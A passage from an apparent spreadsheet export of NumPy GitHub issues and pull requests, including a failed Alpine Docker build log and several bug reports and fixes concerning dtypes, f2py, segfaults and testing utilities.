    apk add --update python py-pip python-dev &amp;&amp;\_x000D_
    apk add --update linux-headers &amp;&amp;\_x000D_
    apk add --update postgresql-dev py-psutil_x000D_
# Removed application env vars from here._x000D_
RUN mkdir -p $APP_HOME_x000D_
WORKDIR $APP_HOME_x000D_
COPY requirements* $APP_HOME/_x000D_
RUN pip install numpy_x000D_
RUN pip install pandas_x000D_
RUN pip install -r requirements.txt -r requirements-dev.txt_x000D_
COPY . $APP_HOME_x000D_
EXPOSE $PORT_x000D_
CMD ./run.sh_x000D_
```_x000D_
_x000D_
Complete numpy build trace_x000D_
_x000D_
```_x000D_
Collecting numpy_x000D_
  Downloading https://files.pythonhosted.org/packages/94/b8/09db804ddf3bb7b50767544ec8e559695b152cedd64830040a0f31d6aeda/numpy-1.14.4.zip (4.9MB)_x000D_
Building wheels for collected packages: numpy_x000D_
  Running setup.py bdist_wheel for numpy: started_x000D_
  Running setup.py bdist_wheel for numpy: finished with status 'error'_x000D_
  Complete output from command /usr/local/bin/python -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-pYwQAe/numpy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-Y0cigA --python-tag cp27:_x000D_
  Running from numpy source directory._x000D_
  blas_opt_info:_x000D_
  blas_mkl_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries mkl_rt not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  blis_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries blis not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  openblas_info:_x000D_
  customize UnixCCompiler_x000D_
  customize UnixCCompiler_x000D_
    libraries openblas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_3_10_blas_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  customize UnixCCompiler_x000D_
    libraries tatlas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_3_10_blas_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries satlas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_blas_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  customize UnixCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_blas_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /tmp/pip-install-pYwQAe/numpy/numpy/distutils/system_info.py:624: UserWarning:_x000D_
      Atlas (http://math-atlas.sourceforge.net/) libraries not found._x000D_
      Directories to search for the libraries can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [atlas]) or by setting_x000D_
      the ATLAS environment variable._x000D_
    self.calc_info()_x000D_
  blas_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries blas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /tmp/pip-install-pYwQAe/numpy/numpy/distutils/system_info.py:624: UserWarning:_x000D_
      Blas (http://www.netlib.org/blas/) libraries not found._x000D_
      Directories to search for the libraries can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [blas]) or by setting_x000D_
      the BLAS environment variable._x000D_
    self.calc_info()_x000D_
  blas_src_info:_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /tmp/pip-install-pYwQAe/numpy/numpy/distutils/system_info.py:624: UserWarning:_x000D_
      Blas (http://www.netlib.org/blas/) sources not found._x000D_
      Directories to search for the sources can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [blas_src]) or by setting_x000D_
      the BLAS_SRC environment variable._x000D_
    self.calc_info()_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /bin/sh: svnversion: not found_x000D_
  non-existing path in 'numpy/distutils': 'site.cfg'_x000D_
  /bin/sh: svnversion: not found_x000D_
  F2PY Version 2_x000D_
  lapack_opt_info:_x000D_
  lapack_mkl_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries mkl_rt not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  openblas_lapack_info:_x000D_
  customize UnixCCompiler_x000D_
  customize UnixCCompiler_x000D_
    libraries openblas not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  openblas_clapack_info:_x000D_
  customize UnixCCompiler_x000D_
  customize UnixCCompiler_x000D_
    libraries openblas,lapack not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_3_10_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  customize UnixCCompiler_x000D_
    libraries tatlas,tatlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries tatlas,tatlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries tatlas,tatlas not found in /usr/lib/_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib/_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_3_10_threads_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_3_10_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries satlas,satlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries satlas,satlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries satlas,satlas not found in /usr/lib/_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib/_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_3_10_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  customize UnixCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in /usr/lib/_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib/_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_threads_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  atlas_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/local/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib_x000D_
  customize UnixCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in /usr/lib/_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack_atlas not found in /usr/lib/_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  lapack_info:_x000D_
  customize UnixCCompiler_x000D_
    libraries lapack not found in ['/usr/local/lib', '/usr/lib', '/usr/lib/']_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /tmp/pip-install-pYwQAe/numpy/numpy/distutils/system_info.py:624: UserWarning:_x000D_
      Lapack (http://www.netlib.org/lapack/) libraries not found._x000D_
      Directories to search for the libraries can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [lapack]) or by setting_x000D_
      the LAPACK environment variable._x000D_
    self.calc_info()_x000D_
  lapack_src_info:_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /tmp/pip-install-pYwQAe/numpy/numpy/distutils/system_info.py:624: UserWarning:_x000D_
      Lapack (http://www.netlib.org/lapack/) sources not found._x000D_
      Directories to search for the sources can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [lapack_src]) or by setting_x000D_
      the LAPACK_SRC environment variable._x000D_
    self.calc_info()_x000D_
    NOT AVAILABLE_x000D_
  _x000D_
  /usr/local/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'define_macros'_x000D_
    warnings.warn(msg)_x000D_
  running bdist_wheel_x000D_
  running build_x000D_
  running config_cc_x000D_
  unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
  running config_fc_x000D_
  unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
  running build_src_x000D_
  build_src_x000D_
  building py_modules sources_x000D_
  creating build_x000D_
  creating build/src.linux-x86_64-2.7_x000D_
  creating build/src.linux-x86_64-2.7/numpy_x000D_
  creating build/src.linux-x86_64-2.7/numpy/distutils_x000D_
  building library "npymath" sources_x000D_
  get_default_fcompiler: matching types: '['gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq', 'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor']'_x000D_
  customize Gnu95FCompiler_x000D_
  Found executable /usr/bin/gfortran_x000D_
  customize Gnu95FCompiler_x000D_
  customize Gnu95FCompiler using config_x000D_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gcc _configtest.o -o _configtest_x000D_
  success!_x000D_
  removing: _configtest.c _configtest.o _configtest_x000D_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_configtest.c:1:5: warning: conflicting types for built-in function 'exp'_x000D_
   int exp (void);_x000D_
       ^~~_x000D_
  gcc _configtest.o -o _configtest_x000D_
  success!_x000D_
  removing: _configtest.c _configtest.o _configtest_x000D_
  creating build/src.linux-x86_64-2.7/numpy/core_x000D_
  creating build/src.linux-x86_64-2.7/numpy/core/src_x000D_
  creating build/src.linux-x86_64-2.7/numpy/core/src/npymath_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npymath/npy_math_internal.h_x000D_
    adding 'build/src.linux-x86_64-2.7/numpy/core/src/npymath' to include_dirs._x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npymath/ieee754.c_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npymath/npy_math_complex.c_x000D_
  None - nothing done with h_files = ['build/src.linux-x86_64-2.7/numpy/core/src/npymath/npy_math_internal.h']_x000D_
  building library "npysort" sources_x000D_
  creating build/src.linux-x86_64-2.7/numpy/core/src/npysort_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npysort/quicksort.c_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npysort/mergesort.c_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npysort/heapsort.c_x000D_
  creating build/src.linux-x86_64-2.7/numpy/core/src/private_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/private/npy_partition.h_x000D_
    adding 'build/src.linux-x86_64-2.7/numpy/core/src/private' to include_dirs._x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npysort/selection.c_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/private/npy_binsearch.h_x000D_
  conv_template:&gt; build/src.linux-x86_64-2.7/numpy/core/src/npysort/binsearch.c_x000D_
  None - nothing done with h_files = ['build/src.linux-x86_64-2.7/numpy/core/src/private/npy_partition.h', 'build/src.linux-x86_64-2.7/numpy/core/src/private/npy_binsearch.h']_x000D_
  building extension "numpy.core._dummy" sources_x000D_
  Generating build/src.linux-x86_64-2.7/numpy/core/include/numpy/config.h_x000D_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_configtest.c:1:24: fatal error: sys/endian.h: No such file or directory_x000D_
   #include &lt;sys/endian.h&gt;_x000D_
                          ^_x000D_
  compilation terminated._x000D_
  _configtest.c:1:24: fatal error: sys/endian.h: No such file or directory_x000D_
   #include &lt;sys/endian.h&gt;_x000D_
                          ^_x000D_
  compilation terminated._x000D_
  failure._x000D_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 4)];_x000D_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 8)];_x000D_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 8)];_x000D_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 16)];_x000D_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_configtest.c:7:12: error: 'SIZEOF_LONGDOUBLE' undeclared (first use in this function)_x000D_
       (void) SIZEOF_LONGDOUBLE;_x000D_
              ^~~~~~~~~~~~~~~~~_x000D_
  _configtest.c:7:12: note: each undeclared identifier is reported only once for each function it appears in_x000D_
  _configtest.c: In function 'main':_x000D_
  _configtest.c:7:12: error: 'SIZEOF_LONGDOUBLE' undeclared (first use in this function)_x000D_
       (void) SIZEOF_LONGDOUBLE;_x000D_
              ^~~~~~~~~~~~~~~~~_x000D_
  _configtest.c:7:12: note: each undeclared identifier is reported only once for each function it appears in_x000D_
  failure._x000D_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 16)];_x000D_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 32)];_x000D_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_configtest.c:7:16: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_configtest.c:7:16: warning: variable 'test_array' set but not used [-Wunused-but-set-variable]_x000D_
       static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == 8)];_x000D_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_configtest.c:7:16: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_configtest.c:7:16: warning: variable 'test_array' set but not used [-Wunused-but-set-variable]_x000D_
       static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == 8)];_x000D_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_configtest.c:7:16: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_configtest.c:7:16: warning: variable 'test_array' set but not used [-Wunused-but-set-variable]_x000D_
       static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == 8)];_x000D_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&gt;= 0)];_x000D_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 In function 'main':_x000D_
  _configtest.c:5:16: warning: variable 'test_array' set but not used [-Wunused-but-set-variable]_x000D_
       static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == 8)];_x000D_
                  ^~~~~~~~~~_x000D_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success!_x000D_
  removing: _configtest.c _configtest.o_x000D_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_configtest.c:1:5: warning: conflicting types for built-in function 'exp'_x000D_
   int exp (void);_x000D_
       ^~~_x000D_
  gcc _configtest.o -o _configtest_x000D_
  success!_x000D_
  removing: _configtest.c _configtest.o _configtest_x000D_
  C compiler: gcc -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -DTHREAD_STACK_SIZE=0x100000 -fPIC_x000D_
  _x000D_
  compile options: '-Inumpy/core/src/private -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/usr/local/include/python2.7 -c'_x000D_
  gcc: _configtest.c_x000D_
  _configtest.c:1:5: warning: conflicting types for built-in function 'asin'_x000D_
   int asin (void);_x000D_
       ^~~~_x000D_
  _configtest.c:2:5: warning: conflicting types for built-in function 'cos'_x000D_
   int cos (void);_x000D_
       ^~~_x000D_
  _configtest.c:3:5: warning: conflicting types for built-in function 'log'_x000D_
   int log (void);_x000D_
       ^~~_x000D_
  _configtest.c:4:5: warning: conflicting types for built-in function 'fabs'_x000D_
   int fabs (void);_x000D_
       ^~~~_x000D_
  _configtest.c:5:5: warning: conflicting types for built-in function 'tanh'_x000D_
   int tanh (void);_x000D_
       ^~~~_x000D_
  _configtest.c:6:5: warning: conflicting types for built-in function 'atan'_x000D_
   int atan (void);_x000D_
       ^~~~_x000D_
  _configtest.c:7:5: warning: conflicting types for built-in function 'acos'_x000D_
   int acos (void);_x000D_
       ^~~~_x000D_
  _configtest.c:8:5: warning: conflicting types for built-in function 'floor'_x000D_
   int floor (void);_x000D_
       ^~~~~_x000D_
  _configtest.c:9:5: warning: conflicting types for built-in function 'fmod'_x000D_
   int fmod (void)</t>
  </si>
  <si>
    <t>Compile error with pip install on docker python:2.7-alpine</t>
  </si>
  <si>
    <t>['50 - Duplicate', '57 - Close?']</t>
  </si>
  <si>
    <t>I'd consider `if dtype.names:` to be an antipattern, since that erroneously ignores empty fields._x000D_
_x000D_
Sure, there's no real use case here, but it's still better not to crash internally in these cases.</t>
  </si>
  <si>
    <t>BUG: Prevent crashes on 0-length structured void scalars</t>
  </si>
  <si>
    <t>This change was introduced as part of #10232_x000D_
_x000D_
Fixes #11112</t>
  </si>
  <si>
    <t>As requested on the mailing list.</t>
  </si>
  <si>
    <t>NEP: Expansion of gufunc signatures.</t>
  </si>
  <si>
    <t>Milestoning for 1.15, since we changed the behavior of `__array_wrap__`  in #10919, so if user code breaks as a result, it needs to not segfault!</t>
  </si>
  <si>
    <t>BUG: Fix segfault on failing `__array_wrap__`</t>
  </si>
  <si>
    <t>Extracted from #9022, since that's segfaulting, and maybe this piece is fine.</t>
  </si>
  <si>
    <t>MAINT: Extract a helper function to apply __array_wrap__</t>
  </si>
  <si>
    <t>The `npy_get_floatstatus_barrier` had an extra parentheses in the_x000D_
argument list of the function definition that was exposed when compiling_x000D_
on NetBSD._x000D_
_x000D_
Closes #11288.</t>
  </si>
  <si>
    <t>BUG: Remove extra trailing parentheses.</t>
  </si>
  <si>
    <t>The `numericaltypes` module contains code documentation outlining the hierarchy of scalar dtypes. This hierarchy was however unclear or incorrect, e.g., seemingly indicating that floats and unsigned integers were not subtypes of `numpy.number`._x000D_
_x000D_
This PR is a trivial edit to align the hierarchy in the code documentation with the `subdtype` relation, cf. https://docs.scipy.org/doc/numpy-1.13.0/reference/arrays.scalars.html. The type indicated for the kind shorthand 'i' was also updated.</t>
  </si>
  <si>
    <t>DOC: fix hierarchy of numericaltype</t>
  </si>
  <si>
    <t>Problem description_x000D_
--_x000D_
According to `np.average`'s [docstring](https://github.com/numpy/numpy/blob/df7b99c63b3686a25b10888e8374a936ab615de7/numpy/lib/function_base.py#L310):_x000D_
&gt; The return type is `Float` if `a` is of integer type, otherwise it is of the same type as `a`._x000D_
_x000D_
The [code](https://github.com/numpy/numpy/blob/df7b99c63b3686a25b10888e8374a936ab615de7/numpy/lib/function_base.py#L364), however, behaves differently if `weights != None`:_x000D_
&gt; ``result_dtype = np.result_type(a.dtype, wgt.dtype)``_x000D_
_x000D_
According to the code, the result of ``np.average()`` may be promoted to the `dtype` of the `weights`._x000D_
_x000D_
Long story short: Either the docs or the code should be updated!_x000D_
_x000D_
Code reproducing the behavior:_x000D_
--_x000D_
```Python_x000D_
import numpy as np_x000D_
a_f4 = np.arange(4, dtype=np.float32).reshape((2, 2))_x000D_
weights_f4 = np.ones(2, dtype=np.float32)_x000D_
weights_f8 = np.ones(2, dtype=np.float64)_x000D_
assert np.average(a_f4, axis=0).dtype == a_f4.dtype  # passes_x000D_
assert np.average(a_f4, weights=weights_f4, axis=0).dtype == a_f4.dtype  # passes_x000D_
assert np.average(a_f4, weights=weights_f8, axis=0).dtype == a_f4.dtype  # raises AssertionError_x000D_
```_x000D_
Tested with Numpy 1.14.2 (version shouldn't matter, though)</t>
  </si>
  <si>
    <t>Return dtype of numpy.average(a, ...) is not always that of its first argument</t>
  </si>
  <si>
    <t>I got a different results in tutorial(https://docs.scipy.org/doc/numpy/user/quickstart.html)._x000D_
_x000D_
I installed Python using the Anaconda distribution on Windows 10 64bit_x000D_
and executed the sample code._x000D_
_x000D_
----------------Sample------------------_x000D_
```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; a = np.arange(15).reshape(3, 5)_x000D_
&gt;&gt;&gt; a_x000D_
array([[ 0,  1,  2,  3,  4],_x000D_
       [ 5,  6,  7,  8,  9],_x000D_
       [10, 11, 12, 13, 14]])_x000D_
&gt;&gt;&gt; a.shape_x000D_
(3, 5)_x000D_
&gt;&gt;&gt; a.ndim_x000D_
2_x000D_
&gt;&gt;&gt; a.dtype.name_x000D_
'int64'_x000D_
&gt;&gt;&gt; a.itemsize_x000D_
8_x000D_
```_x000D_
_x000D_
----------------My Environment----------_x000D_
Windows10 Home 64bit_x000D_
Python 3.6.5_x000D_
numpy1.14.3_x000D_
```_x000D_
$pip freeze_x000D_
numpy==1.14.3_x000D_
$ python_x000D_
Python 3.6.5 |Anaconda, Inc.| (default, Mar 29 2018, 13:32:41) [MSC v.1900 64 bit (AMD64)] on win32_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; a = np.arange(15).reshape(3, 5)_x000D_
&gt;&gt;&gt; a_x000D_
array([[ 0,  1,  2,  3,  4],_x000D_
       [ 5,  6,  7,  8,  9],_x000D_
       [10, 11, 12, 13, 14]])_x000D_
&gt;&gt;&gt; a.shape_x000D_
(3, 5)_x000D_
&gt;&gt;&gt; a.dtype.name_x000D_
'int32'_x000D_
&gt;&gt;&gt; a.itemsize_x000D_
4_x000D_
```_x000D_
_x000D_
The following properties is different from the sample code and my environment._x000D_
    a.dtype.name_x000D_
    a.itemsize_x000D_
_x000D_
Is this due to the diffence in runtime environment(win10/linux/mac....)? # #</t>
  </si>
  <si>
    <t>DOC : Some Properties is different from sample code(quickstart.html)@Windows 10 64bit.</t>
  </si>
  <si>
    <t xml:space="preserve">Recover #11063 from my meddling :()._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: Minor documentation improvements</t>
  </si>
  <si>
    <t>Fixes #10080. Couldn't figure out why matmul was not calling `PyArray_SetWritebackIfCopy`, then figured out it was this.</t>
  </si>
  <si>
    <t>BUG: einsum needs to check overlap on an out argument</t>
  </si>
  <si>
    <t>The argument parsing for ufuncs contains special logic to enable returning `NotImplemented` for comparison functions.  The ufuncs, however, should not have to know whether they were called via a python comparison operator, so this PR moves the logic to the operators, checking after ufunc failed_x000D_
whether a `NotImplemented` should be returned._x000D_
_x000D_
Follow-up of #11260, in particular https://github.com/numpy/numpy/pull/11260#discussion_r193649848</t>
  </si>
  <si>
    <t>MAINT: move comparison operator special-handling out of ufunc parsing.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.core', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #9708 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: make docstring of np.interp clearer</t>
  </si>
  <si>
    <t>Fixes gh-10528_x000D_
Fixes gh-10978_x000D_
Fixes gh-11150_x000D_
_x000D_
It seems we already have some `ctype -&gt; dtype` code that we can fall back on in the frequent cases where ctypes give the wrong pep3118 buffer._x000D_
_x000D_
---_x000D_
_x000D_
_x000D_
This is kind of unfortunate - I was hoping to implement `ctype -&gt; dtype` in terms of the PEP3118 buffer code (https://github.com/numpy/numpy/issues/10533#issuecomment-363681273), but it seems that we have to fall back on the reverse here</t>
  </si>
  <si>
    <t>BUG: Work around past and present PEP3118 issues in ctypes</t>
  </si>
  <si>
    <t>Not initializing arrays throws off valgrind, so avoid it here. For a while_x000D_
I thought it was just a false positive due to some SSE string compare function.</t>
  </si>
  <si>
    <t>TST: Do not use empty arrays in tests (unless they are not read)</t>
  </si>
  <si>
    <t>Replace `NPY_UNUSED(*param)` by `*NPY_UNUSED(param)`._x000D_
_x000D_
Closes #11267.</t>
  </si>
  <si>
    <t>BUG: Correct use of NPY_UNUSED.</t>
  </si>
  <si>
    <t>The tests are a bit ugly, but the cache otherwise hides the errors_x000D_
away during testing._x000D_
The ternary operation did not work, because complex types do not like_x000D_
assignment of 0._x000D_
_x000D_
Closes gh-11261</t>
  </si>
  <si>
    <t>BUG: Remove invalid read in searchsorted if needle is empty</t>
  </si>
  <si>
    <t>Hello, I've run into a small bug that causes an error in Testing.assert_equals._x000D_
_x000D_
Version numbers: _x000D_
* numpy -- 1.14.1_x000D_
* Python -- 3.6.4_x000D_
* OS -- OSX 10.13.4 (17E199)_x000D_
_x000D_
The problem is laid out in code below:_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
_x000D_
float64_nan = np.float64(np.nan)_x000D_
np.testing.assert_equal(float64_nan, np.nan) #succeeds_x000D_
np.testing.assert_equal({float64_nan}, {np.nan}) #fails_x000D_
```_x000D_
It seems like either both of these should fail or both should succeed, seeing as the only thing changed is how the data is structured, but maybe there's something I'm missing?_x000D_
_x000D_
This is a relatively contrived example, but it came up organically when dealing with pandas series/dataframes (which output float64 nans). It looks like maybe without a set both are checked as isNaN, but in the set things are done differently?</t>
  </si>
  <si>
    <t>Testing.assert_equals bug with nan and sets</t>
  </si>
  <si>
    <t>I am trying to install numpy in a Docker image using `python:3.6-alpine3.7` as the base image. _x000D_
_x000D_
When trying to install NumPy with pip (`pip install numpy==1.14.4`), the build fails ([error log](https://github.com/numpy/numpy/files/2080043/error_1.14.4.log)). I have tried installing version 1.14.3 and there are no errors in this case ([install log](https://github.com/numpy/numpy/files/2080042/error_1.14.3.log))._x000D_
_x000D_
Minimal Dockerfile:_x000D_
```Dockerfile_x000D_
FROM python:3.6-alpine3.7_x000D_
RUN apk add --no-cache build-base_x000D_
RUN pip3 install numpy==1.14.4_x000D_
```</t>
  </si>
  <si>
    <t>Building v1.14.4 fails in Docker with Alpine 3.7 and Python 3.6</t>
  </si>
  <si>
    <t>fixes #11250</t>
  </si>
  <si>
    <t>BUG: check for probabilities containing nan-value in random.choice</t>
  </si>
  <si>
    <t>[skip ci]</t>
  </si>
  <si>
    <t>DOC: Update master after NumPy 1.14.4 release.</t>
  </si>
  <si>
    <t>Instead of leaving it to the caller to clean up references to operands._x000D_
_x000D_
This is the promised follow-up to #11257, cleaning up references to operands on failure as well.</t>
  </si>
  <si>
    <t>MAINT: Do proper cleanup in get_ufunc_arguments.</t>
  </si>
  <si>
    <t>**Input:**_x000D_
```python_x000D_
import numpy.f2py_x000D_
source = '''_x000D_
      subroutine foo_x000D_
      print*, "Hello world!"_x000D_
      end _x000D_
'''_x000D_
numpy.f2py.compile(source, modulename='hello')_x000D_
_x000D_
import hello_x000D_
hello.foo()_x000D_
```_x000D_
_x000D_
**Output**:_x000D_
```_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-4-875a80871522&gt; in &lt;module&gt;()_x000D_
----&gt; 1 numpy.f2py.compile(source, modulename='hello')_x000D_
_x000D_
~/miniconda3/lib/python3.6/site-packages/numpy/f2py/__init__.py in compile(source, modulename, extra_args, verbose, source_fn, extension)_x000D_
     57_x000D_
     58     try:_x000D_
---&gt; 59         f.write(source)_x000D_
     60         f.flush()_x000D_
     61_x000D_
_x000D_
~/miniconda3/lib/python3.6/tempfile.py in func_wrapper(*args, **kwargs)_x000D_
    481             @_functools.wraps(func)_x000D_
    482             def func_wrapper(*args, **kwargs):_x000D_
--&gt; 483                 return func(*args, **kwargs)_x000D_
    484             # Avoid closing the file as long as the wrapper is alive,_x000D_
    485             # see issue #18879._x000D_
_x000D_
TypeError: a bytes-like object is required, not 'str'_x000D_
```_x000D_
_x000D_
**The problem:**_x000D_
_x000D_
In [`numpy/numpy/f2py/__init__py`](https://github.com/numpy/numpy/blob/master/numpy/f2py/__init__.py) on line `54`, this command_x000D_
_x000D_
`        f = tempfile.NamedTemporaryFile(suffix=extension)`_x000D_
_x000D_
Calls [`tempfile.NamedTemporaryFile`](https://docs.python.org/3/library/tempfile.html#tempfile.NamedTemporaryFile) with the default write mode, which is `w+b`._x000D_
_x000D_
Subsequently, on line `59`,_x000D_
_x000D_
`        f.write(source)`_x000D_
_x000D_
Attempts to write a `str` to the `NamedTemporaryFile`, which is open in *binary* write mode, which results in the error above._x000D_
_x000D_
**The fix**_x000D_
_x000D_
Change line `54` from_x000D_
_x000D_
`        f = tempfile.NamedTemporaryFile(suffix=extension)`_x000D_
_x000D_
to_x000D_
_x000D_
`        f = tempfile.NamedTemporaryFile(suffix=extension, mode='w')`_x000D_
_x000D_
**Re-do the input**_x000D_
_x000D_
```python_x000D_
import numpy.f2py_x000D_
source = '''_x000D_
      subroutine foo_x000D_
      print*, "Hello world!"_x000D_
      end _x000D_
'''_x000D_
numpy.f2py.compile(source, modulename='hello')_x000D_
_x000D_
import hello_x000D_
hello.foo()_x000D_
```_x000D_
_x000D_
**Output**_x000D_
_x000D_
`Hello world!`</t>
  </si>
  <si>
    <t>BUG: Fix f2py: NamedTemporaryFile permissions: w+b --&gt; w</t>
  </si>
  <si>
    <t>['00 - Bug', '59 - Needs tests', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Alternative to #11244, where `get_ufunc_arguments` just ensures any object from the kwargs has its own reference. Must say I like this better.</t>
  </si>
  <si>
    <t>BUG: ensure extobj and axes have their own references.</t>
  </si>
  <si>
    <t>This was info that would have been helpful for me in the 1.14.3. Some of it @charris told me in comments, some of it I missed.</t>
  </si>
  <si>
    <t>DOC: show how to generate release notes in release walkthrough</t>
  </si>
  <si>
    <t>DOC: Document 1.14.4 release.</t>
  </si>
  <si>
    <t>If I provide a list of None or np.nan as a probs parameter to np.random.choice, I don't get any errors, but always get the first element._x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; np.__version___x000D_
'1.14.3'_x000D_
&gt;&gt;&gt; a = np.array([42, 1, 2])_x000D_
&gt;&gt;&gt; probs = [1,2,3]_x000D_
&gt;&gt;&gt; np.random.choice(a, p=probs)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "mtrand.pyx", line 1146, in mtrand.RandomState.choice_x000D_
